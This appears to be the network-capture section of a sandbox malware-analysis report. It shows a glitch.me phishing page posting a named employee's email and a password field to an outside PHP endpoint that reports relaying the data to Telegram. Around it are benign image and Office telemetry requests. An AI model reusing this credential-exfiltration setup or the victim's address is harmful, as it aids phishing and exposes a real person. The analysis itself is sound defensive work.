                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC1071INHTTP/1.1 200 OK
                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                            content-disposition: inline;filename*=UTF-8''Adobe_Acrobat_DC_logo_2020.svg.png
                                                                                                                                                                                                            etag: 1d137f6e42bd3f8a9482eafb0c92d735
                                                                                                                                                                                                            last-modified: Thu, 11 Jul 2024 16:41:53 GMT
                                                                                                                                                                                                            content-length: 12378
                                                                                                                                                                                                            date: Tue, 05 Nov 2024 06:36:50 GMT
                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                            age: 82320
                                                                                                                                                                                                            x-cache: cp3075 hit, cp3075 hit/1
                                                                                                                                                                                                            x-cache-status: hit-front
                                                                                                                                                                                                            server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                            strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                            report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                            nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                            x-client-ip: 173.254.250.80
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            2024-11-06 05:28:51 UTC12378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 80 00 00 01 80 08 06 00 00 00 a4 c7 b5 bf 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 0b 10 29 34 2a 36 a0 70 00 00 2f 5e 49 44 41 54 78 da ed dd 77 b8 13 55 fe c7 f1 f7 99 49 2e 9d 7b 69 a2 08 d2 9b 22 0a 0a 22 45 8a 88 a8 88 8a 6b 41 5d 7b d7 45 fc d9 57 d7 ba d8 fb 5a d7 b5 77 94 55 2c 14 01 05 91 2a bd 08 48 b3 d2 db a5 df 9b 64 ce ef 8f b0 8a 48 b9 b9 99 f4 cf eb 79 7c 54 48 32 93 73 4e be 9f 39 93 cc 19 43 96 b3 55 c8 0f 87 39 d8 33 34 70 0c f5 2c d4 b3 86 fd 0d 54 c5 52 0d
                                                                                                                                                                                                            Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDtIME)4*6p/^IDATxwUI.{i""EkA]{EWZwU,*HdHy|TH2sN9CU934p,TR


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.44974813.32.27.1294432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:52 UTC354OUTGET /elders.com.au HTTP/1.1
                                                                                                                                                                                                            Host: logo.clearbit.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:28:52 UTC559INHTTP/1.1 200 OK
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Date: Tue, 05 Nov 2024 08:02:23 GMT
                                                                                                                                                                                                            x-envoy-response-flags: -
                                                                                                                                                                                                            Server: Clearbit
                                                                                                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            X-Cache: Hit from cloudfront
                                                                                                                                                                                                            Via: 1.1 ef4ff53b101ef123a46ec560b6c94cb8.cloudfront.net (CloudFront)
                                                                                                                                                                                                            X-Amz-Cf-Pop: FRA56-C2
                                                                                                                                                                                                            X-Amz-Cf-Id: rP1-ji5Ujm8-ZfPsDGyYYNu0vjMVPoe6oxcV9Oz9nyf6n0w3tYU9XQ==
                                                                                                                                                                                                            Age: 77189
                                                                                                                                                                                                            2024-11-06 05:28:52 UTC7286INData Raw: 31 63 36 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 1c 35 49 44 41 54 78 9c ec bc 09 b4 5f 55 95 e7 bf f7 3e e7 dc 7b 7f d3 9b 5f e6 97 09 48 18 2a 0c 9a 20 14 85 a0 a0 14 20 15 fe 29 a9 72 40 ff 40 95 55 45 29 b6 88 82 8a c5 20 8a 82 d0 da 45 95 73 e1 80 94 48 ab 5d 62 d1 8d 82 0c 2a 83 03 43 18 43 20 64 4e de 4b f2 5e de f0 1b ee bd e7 9c bd 7b 9d fb 82 ae 5e dd ab 62 3a a1 7f ac e5 ef bb 58 ef f1 7e e3 bd fb 73 f6 74 86 e8 b1 79 87 40 47 ed 13 b5 fb 02 fe d0 d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5 01 d0 66 75 00 b4 59 1d 00 6d 56 07 40 9b d5
                                                                                                                                                                                                            Data Ascii: 1c6ePNGIHDRL\5IDATx_U>{_H* )r@@UE) EsH]b*CC dNK^{^b:X~sty@GfuYmV@fuYmV@fuYmV@fuYmV@fuYmV@
                                                                                                                                                                                                            2024-11-06 05:28:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.449755188.114.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:05 UTC705OUTPOST //pood/phpp4all.php HTTP/1.1
                                                                                                                                                                                                            Host: milo.za.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Content-Length: 260
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDFMSGeSNRptCuEfw
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Origin: https://astonishing-maize-sunstone.glitch.me
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:05 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 44 46 4d 53 47 65 53 4e 52 70 74 43 75 45 66 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 0d 0a 0d 0a 4d 61 74 74 68 65 77 2e 48 61 72 64 69 6e 67 40 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 44 46 4d 53 47 65 53 4e 52 70 74 43 75 45 66 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 44 46 4d 53 47 65 53 4e 52 70 74 43 75 45 66
                                                                                                                                                                                                            Data Ascii: ------WebKitFormBoundaryDFMSGeSNRptCuEfwContent-Disposition: form-data; name="userid"Matthew.Harding@elders.com.au------WebKitFormBoundaryDFMSGeSNRptCuEfwContent-Disposition: form-data; name="userpwd"------WebKitFormBoundaryDFMSGeSNRptCuEf
                                                                                                                                                                                                            2024-11-06 05:29:06 UTC879INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:06 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrUsyrCkkaZXodOD%2F6uoDOjDRPDxNE2YS%2FnDWH6oiGXMDwEY1lrafQIk2YhtD9%2FbVwK3va%2BF4sToOBfGvBNM6spw3fRNmjF7dYIr5dTUXLn4FGwi%2BmAlC%2F6FOzHCig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2af118ffbe7d7-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1881&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1565&delivery_rate=1306269&cwnd=250&unsent_bytes=0&cid=90bd8fd04232334f&ts=758&x=0"
                                                                                                                                                                                                            2024-11-06 05:29:06 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                                                                            Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            2024-11-06 05:29:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.449756188.114.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:07 UTC353OUTGET //pood/phpp4all.php HTTP/1.1
                                                                                                                                                                                                            Host: milo.za.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:07 UTC873INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:07 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wzfE%2Fn%2BLd1msMAisVmdoy6Tb9xZkU797ZKe019KHyogjU2RaHV9OWMJxnnFI1oSlDLz56nYhjT9BjZeSITP0Efu5nxe7xsGxJJtszQA41%2F16c7i2x8OqHGgrRj9Ftw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2af1cc9903159-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=931&delivery_rate=2479452&cwnd=234&unsent_bytes=0&cid=340c2a57ceae31db&ts=1035&x=0"
                                                                                                                                                                                                            2024-11-06 05:29:07 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                                                                            Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            2024-11-06 05:29:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.457673188.114.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:27 UTC705OUTPOST //pood/phpp4all.php HTTP/1.1
                                                                                                                                                                                                            Host: milo.za.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Content-Length: 260
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQQt9ENUX3wprAIdO
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Origin: https://astonishing-maize-sunstone.glitch.me
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:27 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 51 74 39 45 4e 55 58 33 77 70 72 41 49 64 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 0d 0a 0d 0a 4d 61 74 74 68 65 77 2e 48 61 72 64 69 6e 67 40 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 51 74 39 45 4e 55 58 33 77 70 72 41 49 64 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 51 74 39 45 4e 55 58 33 77 70 72 41 49 64
                                                                                                                                                                                                            Data Ascii: ------WebKitFormBoundaryQQt9ENUX3wprAIdOContent-Disposition: form-data; name="userid"Matthew.Harding@elders.com.au------WebKitFormBoundaryQQt9ENUX3wprAIdOContent-Disposition: form-data; name="userpwd"------WebKitFormBoundaryQQt9ENUX3wprAId
                                                                                                                                                                                                            2024-11-06 05:29:28 UTC873INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:27 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uB2olr6LP5PsyOHc0auwFGgDjuRuRsjTqaF216UPxuREL1CG4r0YTAR97rc7MuwZLf1BFMVvkR0LldkMa1IJKgK0IpVQji%2F1SXCLBdZfpmzXaLINo8EuD2p%2F%2B5UABg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2af9a5fd76b83-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1134&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1565&delivery_rate=2635122&cwnd=242&unsent_bytes=0&cid=36e9f72a875bdfcd&ts=705&x=0"
                                                                                                                                                                                                            2024-11-06 05:29:28 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                                                                            Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            2024-11-06 05:29:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.457674188.114.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:28 UTC353OUTGET //pood/phpp4all.php HTTP/1.1
                                                                                                                                                                                                            Host: milo.za.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:29 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:29 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apCXmJoHoE%2FvmeYL%2BXq%2F92AzPf9O2id3oxTOyG4iz4lyTwv0VNGU%2FFKNo3ktjLul%2BNqdaXbowWbLHqoBp8rI%2BHclIiy0bOG4TqOvRkN4Prv5khF8j%2B2PbccodXPJBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2afa29e532cbf-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=931&delivery_rate=1782153&cwnd=248&unsent_bytes=0&cid=e740524df46da93a&ts=659&x=0"
                                                                                                                                                                                                            2024-11-06 05:29:29 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                                                                            Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            2024-11-06 05:29:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            11192.168.2.45767513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:38 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:38 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:38 GMT
                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                            Last-Modified: Tue, 05 Nov 2024 00:45:17 GMT
                                                                                                                                                                                                            ETag: "0x8DCFD331E45FB54"
                                                                                                                                                                                                            x-ms-request-id: d6fc9ab7-901e-008f-8051-2f67a6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052938Z-16547b76f7frbg6bhC1DFWr540000000066g000000001pwr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:38 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                            2024-11-06 05:29:38 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                                                            Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
